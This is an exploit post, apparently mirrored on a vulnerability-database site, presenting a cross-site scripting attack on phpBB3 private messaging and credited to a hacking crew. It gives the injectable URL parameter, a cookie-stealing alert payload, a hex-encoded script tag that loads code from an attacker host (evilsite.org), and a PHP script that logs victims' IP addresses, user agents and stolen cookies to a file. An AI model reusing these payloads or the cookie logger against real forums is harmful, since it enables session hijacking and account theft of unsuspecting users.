################################################## #################################### # # # Authors: Dante90, WaRWolFz Crew # # T0T4L, Ex Member Crew # # Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] # # MSN: dante90.dmc4@hotmail.it # # Web: www.warwolfz.org # # Description: XSS (Cross Site Scripting), Grab Status: 100%. # # # ################################################## #################################### XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779 [xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))} Redirect Code [Ascii --> Hex]: [xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e (<script src=http://www.evilsite.org/WaRWolFz/file.js>) <?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET['warwolfz']; $time = date("Y-m-d G:i:s A"); $text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n"; $file = fopen('cookies.html' , 'a'); fwrite($file,$text); fclose($file); ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论